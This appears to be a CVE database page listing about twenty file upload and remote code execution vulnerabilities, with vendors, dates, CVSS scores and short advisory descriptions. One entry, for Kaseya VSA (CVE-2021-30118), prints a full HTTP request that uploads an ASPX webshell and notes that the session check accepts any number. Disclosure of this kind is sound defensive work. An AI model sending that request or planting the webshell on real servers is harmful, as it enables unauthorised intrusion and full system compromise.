Total
1580 CVE
| CVE | Vendors | Products | Updated | CVSS v2 | CVSS v3 |
|---|---|---|---|---|---|
| CVE-2022-28053 | 1 Typemill | 1 Typemill | 2022-05-05 | 6.5 MEDIUM | 8.8 HIGH |
| Typemill v1.5.3 was discovered to contain an arbitrary file upload vulnerability via the upload function. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file. | |||||
| CVE-2022-22392 | 1 Ibm | 1 Planning Analytics Workspace | 2022-05-05 | 6.8 MEDIUM | 7.8 HIGH |
| IBM Planning Analytics Local 2.0 could allow an attacker to upload arbitrary executable files which, when executed by an unsuspecting victim could result in code execution. IBM X-Force ID: 222066. | |||||
| CVE-2022-28525 | 1 Ed01-cms Project | 1 Ed01-cms | 2022-05-04 | 6.5 MEDIUM | 8.8 HIGH |
| ED01-CMS v20180505 was discovered to contain an arbitrary file upload vulnerability via /admin/users.php?source=edit_user&id=1. | |||||
| CVE-2021-39040 | 1 Ibm | 1 Planning Analytics Workspace | 2022-05-03 | 6.0 MEDIUM | 8.0 HIGH |
| IBM Planning Analytics Workspace 2.0 could be vulnerable to malicious file upload by not validating the file types or sizes. Attackers can make use of this weakness and upload malicious executable files into the system and it can be sent to victim for performing further attacks. IBM X-Force ID: 214025. | |||||
| CVE-2021-4225 | 2 Microsoft, Smartypantsplugins | 2 Windows, Sp Project \& Document Manager | 2022-05-03 | 6.5 MEDIUM | 8.8 HIGH |
| The SP Project & Document Manager WordPress plugin before 4.24 allows any authenticated users, such as subscribers, to upload files. The plugin attempts to prevent PHP and other similar files that could be executed on the server from being uploaded by checking the file extension. It was discovered that on Windows servers, the security checks in place were insufficient, enabling bad actors to potentially upload backdoors on vulnerable sites. | |||||
| CVE-2019-15813 | 1 Sentrifugo | 1 Sentrifugo | 2022-05-03 | 6.5 MEDIUM | 8.8 HIGH |
| Multiple file upload restriction bypass vulnerabilities in Sentrifugo 3.2 could allow authenticated users to execute arbitrary code via a webshell. | |||||
| CVE-2022-28440 | 1 Ucms Project | 1 Ucms | 2022-05-02 | 6.5 MEDIUM | 8.8 HIGH |
| An arbitrary file upload vulnerability in UCMS v1.6 allows attackers to execute arbitrary code via a crafted PHP file. | |||||
| CVE-2022-0888 | 1 Ninjaforms | 1 Ninja Forms File Uploads | 2022-05-02 | 7.5 HIGH | 9.8 CRITICAL |
| The Ninja Forms - File Uploads Extension WordPress plugin is vulnerable to arbitrary file uploads due to insufficient input file type validation found in the ~/includes/ajax/controllers/uploads.php file which can be bypassed making it possible for unauthenticated attackers to upload malicious files that can be used to obtain remote code execution, in versions up to and including 3.3.0 | |||||
| CVE-2019-10869 | 1 Ninjaforms | 1 Ninja Forms File Uploads | 2022-05-02 | 6.8 MEDIUM | 8.1 HIGH |
| Path Traversal and Unrestricted File Upload exists in the Ninja Forms plugin before 3.0.23 for WordPress (when the Uploads add-on is activated). This allows an attacker to traverse the file system to access files and execute code via the includes/fields/upload.php (aka upload/submit page) name and tmp_name parameters. | |||||
| CVE-2022-24262 | 1 Voipmonitor | 1 Voipmonitor | 2022-04-29 | 6.5 MEDIUM | 8.8 HIGH |
| The config restore function of Voipmonitor GUI before v24.96 does not properly check files sent as restore archives, allowing remote attackers to execute arbitrary commands via a crafted file in the web root. | |||||
| CVE-2021-30118 | 1 Kaseya | 1 Vsa | 2022-04-29 | 10.0 HIGH | 9.8 CRITICAL |
| An attacker can upload files with the privilege of the Web Server process for Kaseya VSA Unified Remote Monitoring & Management (RMM) 9.5.4.2149 and subsequently use these files to execute asp commands The api /SystemTab/uploader.aspx is vulnerable to an unauthenticated arbitrary file upload leading to RCE. An attacker can upload files with the privilege of the Web Server process and subsequently use these files to execute asp commands. Detailed description --- Given the following request: ``` POST /SystemTab/uploader.aspx?Filename=shellz.aspx&PathData=C%3A%5CKaseya%5CWebPages%5C&__RequestValidationToken=ac1906a5-d511-47e3-8500-47cc4b0ec219&qqfile=shellz.aspx HTTP/1.1 Host: 192.168.1.194 Cookie: sessionId=92812726; %5F%5FRequestValidationToken=ac1906a5%2Dd511%2D47e3%2D8500%2D47cc4b0ec219 Content-Length: 12 <%@ Page Language="C#" Debug="true" validateRequest="false" %> <%@ Import namespace="System.Web.UI.WebControls" %> <%@ Import namespace="System.Diagnostics" %> <%@ Import namespace="System.IO" %> <%@ Import namespace="System" %> <%@ Import namespace="System.Data" %> <%@ Import namespace="System.Data.SqlClient" %> <%@ Import namespace="System.Security.AccessControl" %> <%@ Import namespace="System.Security.Principal" %> <%@ Import namespace="System.Collections.Generic" %> <%@ Import namespace="System.Collections" %> <script runat="server"> private const string password = "pass"; // The password ( pass ) private const string style = "dark"; // The style ( light / dark ) protected void Page_Load(object sender, EventArgs e) { //this.Remote(password); this.Login(password); this.Style(); this.ServerInfo(); <snip> ``` The attacker can control the name of the file written via the qqfile parameter and the location of the file written via the PathData parameter. Even though the call requires that a sessionId cookie is passed we have determined that the sessionId is not actually validated and any numeric value is accepted as valid. Security issues discovered --- * a sessionId cookie is required by /SystemTab/uploader.aspx, but is not actually validated, allowing an attacker to bypass authentication * /SystemTab/uploader.aspx allows an attacker to create a file with arbitrary content in any place the webserver has write access * The web server process has write access to the webroot where the attacker can execute it by requesting the URL of the newly created file. Impact --- This arbitrary file upload allows an attacker to place files of his own choosing on any location on the hard drive of the server the webserver process has access to, including (but not limited to) the webroot. If the attacker uploads files with code to the webroot (e.g. aspx code) he can then execute this code in the context of the webserver to breach either the integrity, confidentiality, or availability of the system or to steal credentials of other users. In other words, this can lead to a full system compromise. | |||||
| CVE-2021-36356 | 1 Kramerav | 1 Viaware | 2022-04-29 | 10.0 HIGH | 9.8 CRITICAL |
| KRAMER VIAware through August 2021 allows remote attackers to execute arbitrary code because ajaxPages/writeBrowseFilePathAjax.php accepts arbitrary executable pathnames (even though browseSystemFiles.php is no longer reachable via the GUI). NOTE: this issue exists because of an incomplete fix for CVE-2019-17124. | |||||
| CVE-2022-28021 | 1 Purchase Order Management System Project | 1 Purchase Order Management System | 2022-04-28 | 7.5 HIGH | 9.8 CRITICAL |
| Purchase Order Management System v1.0 was discovered to contain a remote code execution (RCE) vulnerability via /purchase_order/admin/?page=user. | |||||
| CVE-2022-27478 | 1 Victor Cms Project | 1 Victor Cms | 2022-04-28 | 6.5 MEDIUM | 8.8 HIGH |
| Victor v1.0 was discovered to contain a remote code execution (RCE) vulnerability via the component admin/profile.php?section=admin. | |||||
| CVE-2022-27862 | 1 Vikwp | 1 Vikbooking Hotel Booking Engine \& Property Management System Plugin | 2022-04-27 | 7.5 HIGH | 9.8 CRITICAL |
| Arbitrary File Upload leading to RCE in E4J s.r.l. VikBooking Hotel Booking Engine & PMS plugin <= 1.5.3 on WordPress allows attackers to upload and execute dangerous file types (e.g. PHP shell) via the signature upload on the booking form. | |||||
| CVE-2022-23346 | 1 Bigantsoft | 1 Bigant Server | 2022-04-27 | 6.5 MEDIUM | 8.8 HIGH |
| BigAnt Software BigAnt Server v5.6.06 was discovered to contain incorrect access control issues. | |||||
| CVE-2022-27435 | 1 Ecommerce-website Project | 1 Ecommerce-website | 2022-04-27 | 6.5 MEDIUM | 8.8 HIGH |
| An unrestricted file upload at /public/admin/index.php?add_product of Ecommerce-Website v1.1.0 allows attackers to upload a webshell via the Product Image component. | |||||
| CVE-2021-40531 | 2 Apple, Sketch | 2 Macos, Sketch | 2022-04-25 | 7.5 HIGH | 9.8 CRITICAL |
| Sketch before 75 allows library feeds to be used to bypass file quarantine. Files are automatically downloaded and opened, without the com.apple.quarantine extended attribute. This results in remote code execution, as demonstrated by CommandString in a terminal profile to Terminal.app. | |||||
| CVE-2021-26473 | 1 Vembu | 2 Bdr Suite, Offsite Dr | 2022-04-22 | 7.5 HIGH | 9.8 CRITICAL |
| In VembuBDR before 4.2.0.1 and VembuOffsiteDR before 4.2.0.1 the http API located at /sgwebservice_o.php action logFilePath allows an attacker to write arbitrary files in the context of the web server process. These files can then be executed remotely by calling the file via the web server. | |||||
| CVE-2022-27952 | 1 Payloadcms | 1 Payload | 2022-04-20 | 7.5 HIGH | 9.8 CRITICAL |
| An arbitrary file upload vulnerability in the file upload module of PayloadCMS v0.15.0 allows attackers to execute arbitrary code via a crafted SVG file. | |||||